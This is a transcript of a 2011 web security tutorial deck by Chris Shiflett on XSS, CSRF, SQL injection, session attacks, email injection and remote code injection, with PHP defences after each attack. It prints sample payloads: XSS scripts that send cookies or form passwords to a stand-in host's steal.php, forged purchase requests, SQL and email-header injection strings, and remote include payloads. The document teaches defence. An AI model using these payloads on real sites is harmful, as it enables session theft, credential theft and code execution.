Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Evolution of Web Security

Chris Shiflett
September 26, 2011

Evolution of Web Security

This is a multi-faceted tutorial that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I demonstrate how traditional exploits are being combined together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Chris Shiflett

September 26, 2011
Tweet

More Decks by Chris Shiflett

Other Decks in Programming

Transcript

  1. Evolution of
    Web Security
    Chris Shiflett
    @shiflett ▪ shiflett.org

    View Slide

  2. Who am I?
    Web craftsman from Brooklyn, NY, and
    founding member of Analog, a web design
    & development co-operative.

    View Slide

  3. 1. Fundamentals

    View Slide

  4. Defense in depth
    — Redundant safeguards are valuable.
    Least privilege
    — Grant as little freedom as possible.
    Least complicated
    — Complexity breeds mistakes.
    Three Principles

    View Slide

  5. Filter input.
    — Ensure data coming in is valid.
    Escape output.
    — Ensure data going out is not misinterpreted.
    Two Practices

    View Slide

  6. Application Escape
    Filter
    Filter input. Escape output.

    View Slide

  7. $clean = array();
    if (ctype_alpha($_POST['name'])) {
    $clean['name'] = $_POST['name'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  8. $clean = array();
    switch ($_POST['color']) {
    case 'red':
    case 'green':
    case 'blue':
    $clean['color'] = $_POST['color'];
    break;
    default:
    /* Error */
    break;
    }
    ?>

    View Slide

  9. $clean = array();
    $colors = array('red', 'green', 'blue');
    if (in_array($_POST['color'], $colors)) {
    $clean['color'] = $_POST['color'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  10. $clean = array();
    $colors = array();
    $colors['red'] = '';
    $colors['green'] = '';
    $colors['blue'] = '';
    if (isset($colors[$_POST['color']])) {
    $clean['color'] = $_POST['color'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  11. $clean = array();
    if (preg_match('/^\d{5}$/',
    $_POST['zip'])) {
    $clean['zip'] = $_POST['zip'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  12. /* Content-Type: text/html; charset=UTF-8' */
    $html = array();
    $html['user'] = htmlentities($clean['user'],
    ENT_QUOTES,
    'UTF-8');
    echo "Welcome, {$html['user']}.";
    ?>

    View Slide

  13. View Slide

  14. Cross-Site
    Scripting
    Cross-Site
    Request
    Forgeries
    SQL Injection
    Session Fixation
    Session
    Hijacking
    Email Injection
    Remote Code
    Injection
    Exploits

    View Slide

  15. Victim
    Attacker
    Cross-Site Scripting
    Target
    XSS
    HTML
    XSS
    1 2

    View Slide

  16. echo $_GET['user'];
    http://host/foo.php?user=%3Cscript%3E…
    echo '…';<br/>

    View Slide

  17. <br/>document.location =<br/>'http://host/steal.php?cookies=' +<br/>encodeURI(document.cookie);<br/>
    Steal Cookies

    View Slide

  18. <br/>document.forms[0].action =<br/>'http://host/steal.php';<br/>
    Steal Passwords

    View Slide


  19. style="display: none" />
    style="display: none" />


    Steal Saved Passwords

    View Slide


  20. Short & Simple

    View Slide

  21. $string = "alert('XSS');";
    $string = mb_convert_encoding($string, 'UTF-7');
    echo htmlentities($string);
    Character Encoding
    Google XSS Example
    http://shiflett.org/blog/2005/dec/google-xss-example

    View Slide

  22. FIEO.
    Use valid HTML.
    — http://validator.w3.org/
    Use existing solutions.
    — PHP developers, use htmlentities() or htmlspecialchars().
    — Make sure you indicate the character encoding!
    Need to allow HTML?
    — Use HTML Purifier, even if you’re not using PHP:
    http://htmlpurifier.org/
    Stop It!

    View Slide

  23. Target
    Attacker
    Cross-Site Request Forgeries
    Victim
    ? CSRF
    1 2

    View Slide

  24. Because the attack is carried out by
    the victim, CSRF can bypass:
    — HTTP auth
    — Session-based auth
    — Firewalls
    — &c.
    CSRF

    View Slide

  25. Buy

    value="059600656X" />


    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    isbn=059600656X

    View Slide

  26. Forging GET
    GET /buy.php?isbn=059600656X HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234

    View Slide





  27. document.buy.submit();
    Forging POST
    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    isbn=059600656X

    View Slide

  28. Digg (Fixed)
    http://4diggers.blogspot.com/
    Amazon (Fixed?)
    http://shiflett.org/amazon.php
    CSRF Exploits

    View Slide

  29. <br/>new Image().src =<br/>'http://host/steal.php?cookies=' +<br/>encodeURI(document.cookie);<br/>
    Steal Cookies (Improved)

    View Slide

  30. $token = md5(uniqid(rand(), TRUE));
    $_SESSION['token'] = $token;
    $html['token'] = htmlentities($token, ENT_QUOTES,
    'UTF-8');
    Stop It!
    name="token"
    value="" />

    View Slide

  31. Database
    Attacker
    SQL Injection
    Target
    SQL
    SQL
    SQL
    1 2

    View Slide

  32. SELECT count(*)
    FROM users
    WHERE username = '{$_POST['username']}'
    AND password = '…'
    chris' /*
    SELECT count(*)
    FROM users
    WHERE username = 'chris' /*'
    AND password = '…'

    View Slide

  33. FIEO.
    Use prepared statements.
    — PHP developers, use PDO.
    Stop It!
    addslashes() Versus mysql_real_escape_string()
    http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

    View Slide

  34. http://host/login.php?PHPSESSID=1234
    Session Fixation

    View Slide

  35. Regenerate the session identifier.
    — PHP developers, session_regenerate_id(TRUE).
    Do this whenever the privilege level
    changes.
    Stop It!

    View Slide

  36. Attacker impersonates a victim.
    In PHP, by default, only requires a valid
    session identifier.
    Session identifier obtained using:
    — Prediction
    — Capture
    — Fixation
    Session Hijacking

    View Slide

  37. Understand how sessions work.
    Minimize session identifier exposure.
    — SSL
    — Separate domain for embedded resources
    Trending
    — https://panopticlick.eff.org/
    — More on this later…
    Stop It!

    View Slide

  38. [email protected]\r\nBcc: [email protected]\r\nBcc: …
    To: [email protected]
    Subject: Feedback
    From: [email protected]
    Bcc: [email protected]
    Bcc: …
    Email Injection
    mail('[email protected]', 'Feedback', '...',
    "From: {$_POST['email']}");

    View Slide

  39. FIEO.
    — http://iamcal.com/publish/articles/php/parsing_email
    — PHP developers, use ctype_print() as defense in depth.
    Stop It!

    View Slide

  40. Target
    Attacker
    Remote Code Injection

    View Slide

  41. include "{$_COOKIE['type']}.php";
    Cookie: type=http://host/inject.inc?
    include "http://host/inject.inc?.php";

    View Slide

  42. This example exploits allow_url_fopen.
    PHP 5 has allow_url_include.
    — By default, allow_url_include is disabled.
    Remote Code Injection

    View Slide

  43. include "php://input";
    POST /script.php?type=php://input%00 HTTP/1.1
    Host: host
    Content-Type: application/x-www-form-urlencoded
    Content-Length: ?
    ?
    include "{$_GET['type']}.php";

    View Slide

  44. FIEO.
    — If at all possible, use a white list.
    Stop It!

    View Slide

  45. 2. Emerging Trends

    View Slide

  46. Ajax
    “The name is shorthand for Asynchronous
    JavaScript + XML, and it represents a
    fundamental shift in what’s possible on
    the Web.”
    — Jesse James Garrett

    View Slide

  47. Ajax
    “Client-side techniques & technologies
    that allow two-way communication
    between the client and the server without
    reloading the page.”

    View Slide

  48. Target
    Victim
    JS
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token
    Cross-Domain Ajax

    View Slide

  49. Target
    Victim
    XSS + Ajax + CSRF
    XSS
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token

    View Slide

  50. XSS is a perfect platform for CSRF.
    CSRF attacks can exploit XSS
    vulnerabilities.
    Victims can become attackers.
    Rinse. Repeat.
    Worms

    View Slide

  51. Browser Hijacking
    http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking
    Myspace CSRF and XSS Worm (Samy)
    http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy

    View Slide




  52. Cross-Domain Ajax
    Thanks, Flash!

    View Slide

  53. Cross-Domain Ajax
    domain="*" API domain Vulnerable?
    No yahoo.com No
    No youtube.com No
    Yes api.flickr.com No
    Yes No adobe.com Yes No

    View Slide

  54. Target
    Attacker
    JavaScript Hijacking
    Victim
    ? CSRF
    1 2
    3
    4

    View Slide


  55. [{"email": "[email protected]"}]
    JavaScript Hijacking Demo
    http://mochikit.com/fortify_fud/

    View Slide

  56. JavaScript Hijacking
    “If you audit your application for CSRF
    flaws, you’ve defeated this attack.
    Moreover, the well-known, pre-existing
    exploits for CSRF are actually worse than
    this attack.”
    — Thomas Ptacek

    View Slide

  57. 3. Ideas for the Future

    View Slide

  58. Panopticlick
    https://panopticlick.eff.org/
    Trending
    “When you visit a web site, you are
    allowing that site to access a lot of
    information about your computer’s
    configuration. Combined, this information
    can create a kind of fingerprint — a
    signature that could be used to identify
    you and your computer.”

    View Slide

  59. Trending
    “Not the intent, but Panopticlick from @eff
    would be useful for preventing session
    hijacking.”
    — http://twitter.com/shiflett/status/8562663352

    View Slide

  60. Establish trends to help detect
    anomalies.
    Trends can be based on identity or
    behavior.
    Trending is imperfect; use as defense in
    depth.
    Trending

    View Slide

  61. Slides
    http://shiflett.org/evolution-of-web-security.pdf
    http://slideshare.net/shiflett

    View Slide

  62. Follow me on Twitter.
    — @shiflett
    Comment on my blog.
    — shiflett.org
    Email me.
    — chris@shiflett.org
    Work with me.
    — analog.coop
    Feedback?

    View Slide